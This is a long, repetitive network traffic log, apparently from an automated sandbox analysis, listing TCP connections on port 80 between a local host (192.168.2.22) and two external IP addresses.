    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
